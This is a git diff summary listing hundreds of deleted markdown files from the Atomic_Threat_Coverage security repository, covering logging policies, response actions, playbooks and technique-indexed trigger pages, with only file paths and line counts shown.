 ...ther_sysmon_events_with_event_id_1_data.md |  60 --
 ...nt_id_11_with_TargetFilePathFingerprint.md |  32 -
 ...rprint_from_enriched_sysmon_event_id_11.md |  30 -
 ...1_windows_LocalAccountTokenFilterPolicy.md |  25 -
 .../LP0001_windows_audit_process_creation.md  |  25 -
 ...audit_process_creation_with_commandline.md |  27 -
 .../LP0003_windows_sysmon_process_creation.md |  22 -
 .../LP0004_windows_audit_logon.md             |  26 -
 ...P0005_windows_sysmon_network_connection.md |  18 -
 .../LP0006_windows_sysmon_image_loaded.md     |  18 -
 .../LP0007_windows_sysmon_ProcessAccess.md    |  28 -
 .../LP0008_windows_sysmon_FileCreate.md       |  93 --
 .../LP0009_windows_sysmon_PipeEvent.md        |  21 -
 .../LP0010_windows_sysmon_WmiEvent.md         |  24 -
 .../LP0011_windows_sysmon_DnsQuery.md         |  22 -
 ...windows_audit_directory_service_changes.md |  26 -
 ...6_windows_audit_user_account_management.md |  26 -
 ..._windows_audit_directory_service_access.md |  26 -
 .../LP0028_windows_audit_sam.md               |  26 -
 ...P0029_windows_audit_detailed_file_share.md |  26 -
 .../LP0030_windows_audit_file_share.md        |  26 -
 .../LP0031_linux_auditd_execve.md             |  38 -
 ...LP0032_linux_auditd_read_access_to_file.md |  32 -
 .../LP0033_linux_auditd_syscall.md            |  35 -
 .../LP0034_linux_named_client_security_log.md |  35 -
 ...P0037_windows_audit_audit_policy_change.md |  32 -
 ...s_audit_kerberos_authentication_service.md |  31 -
 .../LP0039_windows_audit_kernel_object.md     |  31 -
 ...indows_audit_other_object_access_events.md |  31 -
 ...P0042_windows_audit_handle_manipulation.md |  31 -
 .../LP0044_windows_ntlm_audit.md              |  28 -
 ...ows_audit_filtering_platform_connection.md |  25 -
 ...046_windows_audit_security_state_change.md |  25 -
 .../LP0047_BIND_DNS_queries.md                |  24 -
 .../LP0048_Passive_DNS_logging.md             |  33 -
 ...windows_audit_security_system_extension.md |  26 -
 ...windows_audit_security_group_management.md |  26 -
 .../LP0102_windows_audit_file_system.md       |  26 -
 .../LP0103_windows_audit_registry.md          |  26 -
 .../LP0104_windows_audit_removable_storage.md |  26 -
 ...ndows_audit_authorization_policy_change.md |  26 -
 ...udit_kerberos_service_ticket_operations.md |  26 -
 ...107_windows_audit_credential_validation.md |  26 -
 ...P0108_windows_powershell_module_logging.md |  30 -
 ...109_windows_powershell_script_block_log.md |  28 -
 .../LP0110_windows_powershell_transcript.md   |  32 -
 ...sr_block_credential_stealing_from_lsass.md |  26 -
 ...oft_defender_advanced_threat_protection.md |  20 -
 .../Response_Actions/RA_1001_practice.md      |  13 -
 .../RA_1002_take_trainings.md                 |  22 -
 .../RA_1003_raise_personnel_awareness.md      |  14 -
 ...ke_personnel_report_suspicious_activity.md |  13 -
 ...RA_1005_set_up_relevant_data_collection.md |  15 -
 ..._up_a_centralized_long-term_log_storage.md |  15 -
 .../RA_1007_develop_communication_map.md      |  15 -
 .../RA_1008_make_sure_there_are_backups.md    |  15 -
 .../RA_1009_get_network_architecture_map.md   |  15 -
 .../RA_1010_get_access_control_matrix.md      |  15 -
 .../RA_1011_develop_assets_knowledge_base.md  |  15 -
 .../RA_1012_check_analysis_toolset.md         |  15 -
 ...ss_vulnerability_management_system_logs.md |  15 -
 ...A_1014_connect_with_trusted_communities.md |  14 -
 ..._1101_access_external_network_flow_logs.md |  19 -
 ..._1102_access_internal_network_flow_logs.md |  15 -
 .../RA_1103_access_internal_http_logs.md      |  15 -
 .../RA_1104_access_external_http_logs.md      |  14 -
 .../RA_1105_access_internal_dns_logs.md       |  15 -
 .../RA_1106_access_external_dns_logs.md       |  20 -
 .../RA_1107_access_vpn_logs.md                |  15 -
 .../RA_1108_access_dhcp_logs.md               |  15 -
 ...109_access_internal_packet_capture_data.md |  15 -
 ...110_access_external_packet_capture_data.md |  15 -
 ...et_ability_to_block_external_ip_address.md |  18 -
 ...et_ability_to_block_internal_ip_address.md |  15 -
 ...13_get_ability_to_block_external_domain.md |  18 -
 ...14_get_ability_to_block_internal_domain.md |  15 -
 ..._1115_get_ability_to_block_external_url.md |  18 -
 ..._1116_get_ability_to_block_internal_url.md |  15 -
 ...ty_to_block_port_external_communication.md |  15 -
 ...ty_to_block_port_internal_communication.md |  15 -
 ...ty_to_block_user_external_communication.md |  15 -
 ...ty_to_block_user_internal_communication.md |  15 -
 ...ind_data_transferred_by_content_pattern.md |  15 -
 ...ck_data_transferring_by_content_pattern.md |  15 -
 ...23_get_ability_to_list_data_transferred.md |  15 -
 ...get_ability_to_collect_transferred_data.md |  15 -
 ...et_ability_to_identify_transferred_data.md |  15 -
 ...ind_data_transferred_by_content_pattern.md |  15 -
 ...lity_to_list_users_opened_email_message.md |  14 -
 ...ability_to_list_email_message_receivers.md |  14 -
 ..._1203_get_ability_to_block_email_domain.md |  14 -
 ..._1204_get_ability_to_block_email_sender.md |  14 -
 ...205_get_ability_to_delete_email_message.md |  14 -
 ...get_ability_to_quarantine_email_message.md |  14 -
 ...07_get_ability_to_collect_email_message.md |  15 -
 ..._1301_get_ability_to_list_files_created.md |  15 -
 ...1302_get_ability_to_list_files_modified.md |  15 -
 ..._1303_get_ability_to_list_files_deleted.md |  15 -
 ...04_get_ability_to_list_files_downloaded.md |  15 -
 ..._to_list_files_with_tampered_timestamps.md |  15 -
 ...A_1306_get_ability_to_find_file_by_path.md |  15 -
 ...07_get_ability_to_find_file_by_metadata.md |  15 -
 ...A_1308_get_ability_to_find_file_by_hash.md |  15 -
 ...1309_get_ability_to_find_file_by_format.md |  15 -
 ...ability_to_find_file_by_content_pattern.md |  15 -
 .../RA_1311_get_ability_to_collect_file.md    |  15 -
 ..._get_ability_to_quarantine_file_by_path.md |  15 -
 ..._get_ability_to_quarantine_file_by_hash.md |  15 -
 ...et_ability_to_quarantine_file_by_format.md |  15 -
 ...y_to_quarantine_file_by_content_pattern.md |  15 -
 .../RA_1316_get_ability_to_remove_file.md     |  15 -
 ...A_1317_get_ability_to_analyse_file_hash.md |  14 -
 ..._1318_get_ability_to_analyse_windows_pe.md |  14 -
 ...1319_get_ability_to_analyse_macos_macho.md |  14 -
 ...RA_1320_get_ability_to_analyse_unix_elf.md |  14 -
 ...1_get_ability_to_analyse_ms_office_file.md |  14 -
 ...RA_1322_get_ability_to_analyse_pdf_file.md |  14 -
 .../RA_1323_get_ability_to_analyse_script.md  |  14 -
 ..._get_ability_to_list_processes_executed.md |  15 -
 ...lity_to_find_process_by_executable_path.md |  15 -
 ..._to_find_process_by_executable_metadata.md |  15 -
 ...lity_to_find_process_by_executable_hash.md |  15 -
 ...ty_to_find_process_by_executable_format.md |  15 -
 ...d_process_by_executable_content_pattern.md |  15 -
 ...ity_to_block_process_by_executable_path.md |  15 -
 ...to_block_process_by_executable_metadata.md |  15 -
 ...ity_to_block_process_by_executable_hash.md |  15 -
 ...y_to_block_process_by_executable_format.md |  15 -
 ...k_process_by_executable_content_pattern.md |  15 -
 ...ote_computer_management_system_policies.md |  15 -
 ..._ability_to_list_registry_keys_modified.md |  15 -
 ...t_ability_to_list_registry_keys_deleted.md |  15 -
 ..._ability_to_list_registry_keys_accessed.md |  15 -
 ...t_ability_to_list_registry_keys_created.md |  15 -
 ...06_get_ability_to_list_services_created.md |  15 -
 ...7_get_ability_to_list_services_modified.md |  15 -
 ...08_get_ability_to_list_services_deleted.md |  15 -
 ...1509_get_ability_to_remove_registry_key.md |  15 -
 .../RA_1510_get_ability_to_remove_service.md  |  15 -
 ..._1601_manage_identity_management_system.md |  15 -
 ...A_1602_get_ability_to_lock_user_account.md |  15 -
 ...get_ability_to_list_users_authenticated.md |  15 -
 ...ty_to_revoke_authentication_credentials.md |  15 -
 ...1605_get_ability_to_remove_user_account.md |  15 -
 .../RA_2001_list_victims_of_security_alert.md |  15 -
 .../RA_2002_list_host_vulnerabilities.md      |  15 -
 ..._put_compromised_accounts_on_monitoring.md |  14 -
 ...hosts_communicated_with_internal_domain.md |  15 -
 ...ist_hosts_communicated_with_internal_ip.md |  15 -
 ...st_hosts_communicated_with_internal_url.md |  15 -
 .../RA_2104_analyse_domain_name.md            |  15 -
 .../Response_Actions/RA_2105_analyse_ip.md    |  15 -
 .../Response_Actions/RA_2106_analyse_uri.md   |  15 -
 ...RA_2107_list_hosts_communicated_by_port.md |  15 -
 .../RA_2108_list_hosts_connected_to_vpn.md    |  15 -
 ...A_2109_list_hosts_connected_to_intranet.md |  15 -
 .../RA_2110_list_data_transferred.md          |  15 -
 .../RA_2111_collect_transferred_data.md       |  15 -
 .../RA_2112_identify_transferred_data.md      |  15 -
 ...hosts_communicated_with_external_domain.md |  13 -
 ...ist_hosts_communicated_with_external_ip.md |  13 -
 ...st_hosts_communicated_with_external_url.md |  13 -
 ...ind_data_transferred_by_content_pattern.md |  15 -
 ...RA_2201_list_users_opened_email_message.md |  14 -
 .../RA_2202_collect_email_message.md          |  23 -
 .../RA_2203_list_email_message_receivers.md   |  14 -
 ...204_make_sure_email_message_is_phishing.md |  20 -
 ..._extract_observables_from_email_message.md |  22 -
 .../RA_2301_list_files_created.md             |  15 -
 .../RA_2302_list_files_modified.md            |  15 -
 .../RA_2303_list_files_deleted.md             |  15 -
 .../RA_2304_list_files_downloaded.md          |  15 -
 ...305_list_files_with_tampered_timestamps.md |  15 -
 .../RA_2306_find_file_by_path.md              |  15 -
 .../RA_2307_find_file_by_metadata.md          |  15 -
 .../RA_2308_find_file_by_hash.md              |  15 -
 .../RA_2309_find_file_by_format.md            |  15 -
 .../RA_2310_find_file_by_content_pattern.md   |  15 -
 .../Response_Actions/RA_2311_collect_file.md  |  15 -
 .../RA_2312_analyse_file_hash.md              |  15 -
 .../RA_2313_analyse_windows_pe.md             |  15 -
 .../RA_2314_analyse_macos_macho.md            |  15 -
 .../RA_2315_analyse_unix_elf.md               |  15 -
 .../RA_2316_analyse_ms_office_file.md         |  15 -
 .../RA_2317_analyse_pdf_file.md               |  15 -
 .../RA_2318_analyse_script.md                 |  14 -
 .../RA_2401_list_processes_executed.md        |  15 -
 ...RA_2402_find_process_by_executable_path.md |  15 -
 ...403_find_process_by_executable_metadata.md |  15 -
 ...RA_2404_find_process_by_executable_hash.md |  15 -
 ..._2405_find_process_by_executable_format.md |  15 -
 ...d_process_by_executable_content_pattern.md |  15 -
 .../RA_2501_list_registry_keys_modified.md    |  15 -
 .../RA_2502_list_registry_keys_deleted.md     |  15 -
 .../RA_2503_list_registry_keys_accessed.md    |  15 -
 .../RA_2504_list_registry_keys_created.md     |  15 -
 .../RA_2505_list_services_created.md          |  15 -
 .../RA_2506_list_services_modified.md         |  15 -
 .../RA_2507_list_services_deleted.md          |  15 -
 .../RA_2601_list_users_authenticated.md       |  15 -
 .../RA_3001_patch_vulnerability.md            |  15 -
 .../RA_3101_block_external_ip_address.md      |  17 -
 .../RA_3102_block_internal_ip_address.md      |  13 -
 .../RA_3103_block_external_domain.md          |  18 -
 .../RA_3104_block_internal_domain.md          |  14 -
 .../RA_3105_block_external_url.md             |  13 -
 .../RA_3106_block_internal_url.md             |  13 -
 ..._3107_block_port_external_communication.md |  13 -
 ..._3108_block_port_internal_communication.md |  13 -
 ..._3109_block_user_external_communication.md |  13 -
 ..._3110_block_user_internal_communication.md |  13 -
 ...ck_data_transferring_by_content_pattern.md |  15 -
 .../RA_3201_block_domain_on_email.md          |  14 -
 .../RA_3202_block_sender_on_email.md          |  14 -
 .../RA_3203_quarantine_email_message.md       |  14 -
 .../RA_3301_quarantine_file_by_format.md      |  15 -
 .../RA_3302_quarantine_file_by_hash.md        |  15 -
 .../RA_3303_quarantine_file_by_path.md        |  15 -
 ...3304_quarantine_file_by_content_pattern.md |  15 -
 ...A_3401_block_process_by_executable_path.md |  15 -
 ...02_block_process_by_executable_metadata.md |  15 -
 ...A_3403_block_process_by_executable_hash.md |  15 -
 ...3404_block_process_by_executable_format.md |  15 -
 ...k_process_by_executable_content_pattern.md |  15 -
 .../RA_3501_disable_system_service.md         |  15 -
 .../RA_3601_lock_user_account.md              |  15 -
 ...1_report_incident_to_external_companies.md |  25 -
 .../RA_4101_remove_rogue_network_device.md    |  15 -
 .../RA_4201_delete_email_message.md           |  13 -
 .../Response_Actions/RA_4301_remove_file.md   |  15 -
 .../RA_4501_remove_registry_key.md            |  15 -
 .../RA_4502_remove_service.md                 |  15 -
 ..._4601_revoke_authentication_credentials.md |  18 -
 .../RA_4602_remove_user_account.md            |  15 -
 ...A_5001_reinstall_host_from_golden_image.md |  15 -
 .../RA_5002_restore_data_from_backup.md       |  15 -
 .../RA_5101_unblock_blocked_ip.md             |  13 -
 .../RA_5102_unblock_blocked_domain.md         |  13 -
 .../RA_5103_unblock_blocked_url.md            |  13 -
 .../RA_5104_unblock_blocked_port.md           |  15 -
 .../RA_5105_unblock_blocked_user.md           |  15 -
 .../RA_5201_unblock_domain_on_email.md        |  14 -
 .../RA_5202_unblock_sender_on_email.md        |  13 -
 ..._5203_restore_quarantined_email_message.md |  13 -
 .../RA_5301_restore_quarantined_file.md       |  15 -
 .../RA_5401_unblock_blocked_process.md        |  15 -
 .../RA_5501_enable_disabled_service.md        |  15 -
 .../RA_5601_unlock_locked_user_account.md     |  15 -
 .../RA_6001_develop_incident_report.md        |  21 -
 ...A_6002_conduct_lessons_learned_exercise.md |  22 -
 .../RP_0001_phishing_email.md                 | 344 -------
 .../Response_Stages/RS0001.md                 | 105 --
 .../Response_Stages/RS0002.md                 |  65 --
 .../Response_Stages/RS0003.md                 |  35 -
 .../Response_Stages/RS0004.md                 |  17 -
 .../Response_Stages/RS0005.md                 |  23 -
 .../Response_Stages/RS0006.md                 |  11 -
 .../Response_Stages/responsestages.md         |  10 -
 Atomic_Threat_Coverage/Triggers/T1002.md      | 231 -----
 Atomic_Threat_Coverage/Triggers/T1003.md      | 943 ------------------
 Atomic_Threat_Coverage/Triggers/T1004.md      | 127 ---
 Atomic_Threat_Coverage/Triggers/T1005.md      |  44 -
 Atomic_Threat_Coverage/Triggers/T1007.md      |  74 --
 Atomic_Threat_Coverage/Triggers/T1009.md      |  55 -
 Atomic_Threat_Coverage/Triggers/T1010.md      |  61 --
 Atomic_Threat_Coverage/Triggers/T1012.md      |  65 --
 Atomic_Threat_Coverage/Triggers/T1014.md      | 158 ---
 Atomic_Threat_Coverage/Triggers/T1015.md      |  81 --
 Atomic_Threat_Coverage/Triggers/T1016.md      | 209 ----
 Atomic_Threat_Coverage/Triggers/T1018.md      | 278 ------
 Atomic_Threat_Coverage/Triggers/T1022.md      | 177 ----
 Atomic_Threat_Coverage/Triggers/T1023.md      |  92 --
 Atomic_Threat_Coverage/Triggers/T1027.md      | 128 ---
 Atomic_Threat_Coverage/Triggers/T1028.md      | 192 ----
 Atomic_Threat_Coverage/Triggers/T1030.md      |  57 --
 Atomic_Threat_Coverage/Triggers/T1031.md      |  45 -
 Atomic_Threat_Coverage/Triggers/T1032.md      |  59 --
 Atomic_Threat_Coverage/Triggers/T1033.md      |  88 --
 Atomic_Threat_Coverage/Triggers/T1035.md      |  93 --
 Atomic_Threat_Coverage/Triggers/T1036.md      | 310 ------
 Atomic_Threat_Coverage/Triggers/T1037.md      | 233 -----
 Atomic_Threat_Coverage/Triggers/T1038.md      |  51 -
 Atomic_Threat_Coverage/Triggers/T1040.md      | 149 ---
 Atomic_Threat_Coverage/Triggers/T1042.md      |  52 -
 Atomic_Threat_Coverage/Triggers/T1044.md      |  84 --
 Atomic_Threat_Coverage/Triggers/T1045.md      | 159 ---
 Atomic_Threat_Coverage/Triggers/T1046.md      |  89 --
 Atomic_Threat_Coverage/Triggers/T1047.md      | 200 ----
 Atomic_Threat_Coverage/Triggers/T1048.md      | 192 ----
 Atomic_Threat_Coverage/Triggers/T1049.md      | 116 ---
 Atomic_Threat_Coverage/Triggers/T1050.md      | 116 ---
 Atomic_Threat_Coverage/Triggers/T1053.md      | 152 ---
 Atomic_Threat_Coverage/Triggers/T1055.md      | 241 -----
 Atomic_Threat_Coverage/Triggers/T1056.md      |  53 -
 Atomic_Threat_Coverage/Triggers/T1057.md      |  77 --
 Atomic_Threat_Coverage/Triggers/T1058.md      |  44 -
 Atomic_Threat_Coverage/Triggers/T1059.md      |  42 -
 Atomic_Threat_Coverage/Triggers/T1060.md      | 152 ---
 Atomic_Threat_Coverage/Triggers/T1062.md      |  46 -
 Atomic_Threat_Coverage/Triggers/T1063.md      | 165 ---
 Atomic_Threat_Coverage/Triggers/T1064.md      |  89 --
 Atomic_Threat_Coverage/Triggers/T1065.md      |  72 --
 Atomic_Threat_Coverage/Triggers/T1069.md      | 145 ---
 Atomic_Threat_Coverage/Triggers/T1070.md      | 235 -----
 Atomic_Threat_Coverage/Triggers/T1071.md      | 267 -----
 Atomic_Threat_Coverage/Triggers/T1073.md      |  59 --
 Atomic_Threat_Coverage/Triggers/T1074.md      | 113 ---
 Atomic_Threat_Coverage/Triggers/T1075.md      |  90 --
 Atomic_Threat_Coverage/Triggers/T1076.md      |  93 --
 Atomic_Threat_Coverage/Triggers/T1077.md      | 143 ---
 Atomic_Threat_Coverage/Triggers/T1081.md      | 125 ---
 Atomic_Threat_Coverage/Triggers/T1082.md      | 262 -----
 Atomic_Threat_Coverage/Triggers/T1083.md      | 163 ---
 Atomic_Threat_Coverage/Triggers/T1084.md      |  63 --
 Atomic_Threat_Coverage/Triggers/T1085.md      | 260 -----
 Atomic_Threat_Coverage/Triggers/T1086.md      | 462 ---------
 Atomic_Threat_Coverage/Triggers/T1087.md      | 388 -------
 Atomic_Threat_Coverage/Triggers/T1088.md      | 286 ------
 Atomic_Threat_Coverage/Triggers/T1089.md      | 787 ---------------
 Atomic_Threat_Coverage/Triggers/T1090.md      |  89 --
 Atomic_Threat_Coverage/Triggers/T1093.md      |  48 -
 Atomic_Threat_Coverage/Triggers/T1095.md      | 132 ---
 Atomic_Threat_Coverage/Triggers/T1096.md      |  94 --
 Atomic_Threat_Coverage/Triggers/T1097.md      |  45 -
 Atomic_Threat_Coverage/Triggers/T1098.md      |  60 --
 Atomic_Threat_Coverage/Triggers/T1099.md      | 355 -------
 Atomic_Threat_Coverage/Triggers/T1100.md      |  62 --
 Atomic_Threat_Coverage/Triggers/T1101.md      |  45 -
 Atomic_Threat_Coverage/Triggers/T1102.md      |  76 --
 Atomic_Threat_Coverage/Triggers/T1103.md      |  73 --
 Atomic_Threat_Coverage/Triggers/T1105.md      | 388 -------
 Atomic_Threat_Coverage/Triggers/T1106.md      |  53 -
 Atomic_Threat_Coverage/Triggers/T1107.md      | 376 -------
 Atomic_Threat_Coverage/Triggers/T1110.md      |  71 --
 Atomic_Threat_Coverage/Triggers/T1112.md      | 189 ----
 Atomic_Threat_Coverage/Triggers/T1113.md      | 156 ---
 Atomic_Threat_Coverage/Triggers/T1114.md      |  52 -
 Atomic_Threat_Coverage/Triggers/T1115.md      |  74 --
 Atomic_Threat_Coverage/Triggers/T1117.md      | 133 ---
 Atomic_Threat_Coverage/Triggers/T1118.md      | 645 ------------
 Atomic_Threat_Coverage/Triggers/T1119.md      | 146 ---
 Atomic_Threat_Coverage/Triggers/T1121.md      | 116 ---
 Atomic_Threat_Coverage/Triggers/T1122.md      | 175 ----
 Atomic_Threat_Coverage/Triggers/T1123.md      |  35 -
 Atomic_Threat_Coverage/Triggers/T1124.md      |  67 --
 Atomic_Threat_Coverage/Triggers/T1126.md      | 104 --
 Atomic_Threat_Coverage/Triggers/T1127.md      |  83 --
 Atomic_Threat_Coverage/Triggers/T1128.md      |  42 -
 Atomic_Threat_Coverage/Triggers/T1130.md      | 199 ----
 Atomic_Threat_Coverage/Triggers/T1132.md      |  40 -
 Atomic_Threat_Coverage/Triggers/T1135.md      | 146 ---
 Atomic_Threat_Coverage/Triggers/T1136.md      | 203 ----
 Atomic_Threat_Coverage/Triggers/T1137.md      |  90 --
 Atomic_Threat_Coverage/Triggers/T1138.md      | 150 ---
 Atomic_Threat_Coverage/Triggers/T1139.md      |  40 -
 Atomic_Threat_Coverage/Triggers/T1140.md      |  90 --
 Atomic_Threat_Coverage/Triggers/T1141.md      |  67 --
 Atomic_Threat_Coverage/Triggers/T1142.md      |  47 -
 Atomic_Threat_Coverage/Triggers/T1143.md      |  46 -
 Atomic_Threat_Coverage/Triggers/T1144.md      |  43 -
 Atomic_Threat_Coverage/Triggers/T1145.md      | 138 ---
 Atomic_Threat_Coverage/Triggers/T1146.md      | 165 ---
 Atomic_Threat_Coverage/Triggers/T1147.md      |  38 -
 Atomic_Threat_Coverage/Triggers/T1148.md      |  63 --
 Atomic_Threat_Coverage/Triggers/T1150.md      |  38 -
 Atomic_Threat_Coverage/Triggers/T1151.md      |  35 -
 Atomic_Threat_Coverage/Triggers/T1152.md      |  35 -
 Atomic_Threat_Coverage/Triggers/T1153.md      |  65 --
 Atomic_Threat_Coverage/Triggers/T1154.md      |  37 -
 Atomic_Threat_Coverage/Triggers/T1155.md      |  40 -
 Atomic_Threat_Coverage/Triggers/T1156.md      |  73 --
 Atomic_Threat_Coverage/Triggers/T1158.md      | 368 -------
 Atomic_Threat_Coverage/Triggers/T1159.md      |  57 --
 Atomic_Threat_Coverage/Triggers/T1160.md      |  49 -
 Atomic_Threat_Coverage/Triggers/T1163.md      |  37 -
 Atomic_Threat_Coverage/Triggers/T1164.md      |  73 --
 Atomic_Threat_Coverage/Triggers/T1165.md      |  41 -
 Atomic_Threat_Coverage/Triggers/T1166.md      | 124 ---
 Atomic_Threat_Coverage/Triggers/T1168.md      | 143 ---
 Atomic_Threat_Coverage/Triggers/T1169.md      |  38 -
 Atomic_Threat_Coverage/Triggers/T1170.md      | 112 ---
 Atomic_Threat_Coverage/Triggers/T1173.md      |  69 --
 Atomic_Threat_Coverage/Triggers/T1174.md      |  59 --
 Atomic_Threat_Coverage/Triggers/T1176.md      | 112 ---
 Atomic_Threat_Coverage/Triggers/T1179.md      |  65 --
 Atomic_Threat_Coverage/Triggers/T1180.md      |  52 -
 Atomic_Threat_Coverage/Triggers/T1183.md      |  97 --
 Atomic_Threat_Coverage/Triggers/T1191.md      |  99 --
 Atomic_Threat_Coverage/Triggers/T1193.md      |  47 -
 Atomic_Threat_Coverage/Triggers/T1196.md      |  56 --
 Atomic_Threat_Coverage/Triggers/T1197.md      | 129 ---
 Atomic_Threat_Coverage/Triggers/T1201.md      | 227 -----
 Atomic_Threat_Coverage/Triggers/T1202.md      |  79 --
 Atomic_Threat_Coverage/Triggers/T1204.md      | 213 ----
 Atomic_Threat_Coverage/Triggers/T1206.md      |  65 --
 Atomic_Threat_Coverage/Triggers/T1207.md      |  39 -
 Atomic_Threat_Coverage/Triggers/T1208.md      |  46 -
 Atomic_Threat_Coverage/Triggers/T1214.md      |  66 --
 Atomic_Threat_Coverage/Triggers/T1215.md      |  65 --
 Atomic_Threat_Coverage/Triggers/T1216.md      | 110 --
 Atomic_Threat_Coverage/Triggers/T1217.md      | 200 ----
 Atomic_Threat_Coverage/Triggers/T1218.md      | 360 -------
 Atomic_Threat_Coverage/Triggers/T1219.md      |  92 --
 Atomic_Threat_Coverage/Triggers/T1220.md      | 186 ----
 Atomic_Threat_Coverage/Triggers/T1222.md      | 441 --------
 Atomic_Threat_Coverage/Triggers/T1223.md      |  86 --
 Atomic_Threat_Coverage/Triggers/T1482.md      |  91 --
 Atomic_Threat_Coverage/Triggers/T1485.md      | 100 --
 Atomic_Threat_Coverage/Triggers/T1489.md      | 117 ---
 Atomic_Threat_Coverage/Triggers/T1490.md      | 200 ----
 Atomic_Threat_Coverage/Triggers/T1496.md      |  36 -
 Atomic_Threat_Coverage/Triggers/T1500.md      |  60 --
 Atomic_Threat_Coverage/Triggers/T1501.md      |  78 --
 Atomic_Threat_Coverage/Triggers/T1502.md      |  70 --
 Atomic_Threat_Coverage/Triggers/T1504.md      |  62 --
 Atomic_Threat_Coverage/Triggers/T1505.md      |  71 --
 Atomic_Threat_Coverage/Triggers/T1518.md      |  62 --
 Atomic_Threat_Coverage/Triggers/T1519.md      |  46 -
 Atomic_Threat_Coverage/Triggers/T1529.md      | 263 -----
 Atomic_Threat_Coverage/Triggers/T1531.md      | 103 --
 .../Use_Cases/UC_0001_TESTUSECASE.md          |   7 -
 .../Use_Cases/UC_0002_INITIALACCESS.md        |   7 -
 detection_rules/sigma                         |   2 +-
 response/atc_react                            |   2 +-
 triggers/atomic-red-team                      |   2 +-
 954 files changed, 3 insertions(+), 111848 deletions(-)
 delete mode 100644 Atomic_Threat_Coverage/Customers/CU_0001_TESTCUSTOMER.md
 delete mode 100644 Atomic_Threat_Coverage/Customers/CU_0002_TESTCUSTOMER2.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0001_4688_windows_process_creation.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0003_1_windows_sysmon_process_creation.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0004_4624_windows_account_logon.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0005_7045_windows_service_insatalled.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0006_2_windows_sysmon_process_changed_a_file_creation_time.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0007_3_windows_sysmon_network_connection.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0008_4_windows_sysmon_sysmon_service_state_changed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0009_5_windows_sysmon_process_terminated.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0010_6_windows_sysmon_driver_loaded.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0011_7_windows_sysmon_image_loaded.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0012_8_windows_sysmon_CreateRemoteThread.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0013_9_windows_sysmon_RawAccessRead.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0014_10_windows_sysmon_ProcessAccess.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0015_11_windows_sysmon_FileCreate.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0016_12_windows_sysmon_RegistryEvent.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0017_13_windows_sysmon_RegistryEvent.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0018_14_windows_sysmon_RegistryEvent.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0019_15_windows_sysmon_FileCreateStreamHash.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0020_17_windows_sysmon_PipeEvent.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0021_18_windows_sysmon_PipeEvent.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0022_19_windows_sysmon_WmiEvent.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0023_20_windows_sysmon_WmiEvent.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0024_21_windows_sysmon_WmiEvent.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0026_5136_windows_directory_service_object_was_modified.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0027_4738_user_account_was_changed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0028_4794_directory_services_restore_mode_admin_password_set.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0029_4661_handle_to_an_object_was_requested.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0030_4662_operation_was_performed_on_an_object.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0031_7036_service_started_stopped.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0032_5145_network_share_object_was_accessed_detailed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0033_5140_network_share_object_was_accessed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0034_104_log_file_was_cleared.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0035_106_task_scheduler_task_registered.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0036_4104_windows_powershell_script_block.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0037_4103_windows_powershell_executing_pipeline.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0038_400_engine_state_is_changed_from_none_to_available.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0039_524_system_catalog_has_been_deleted.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0040_528_user_successfully_logged_on_to_a_computer.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0041_529_logon_failure.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0042_675_kerberos_preauthentication_failed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0043_770_dns_server_plugin_dll_has_been_loaded.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0044_1000_application_crashed.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0045_1001_windows_error_reporting.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0046_1031_dhcp_service_callout_dll_file_has_caused_an_exception.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0047_1032_dhcp_service_callout_dll_file_has_caused_an_exception.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0048_1033_dhcp_service_successfully_loaded_callout_dlls.md
 delete mode 100644 Atomic_Threat_Coverage/Data_Needed/DN0049_1034_dhcp_service_failed_to_load_callout_dlls.md
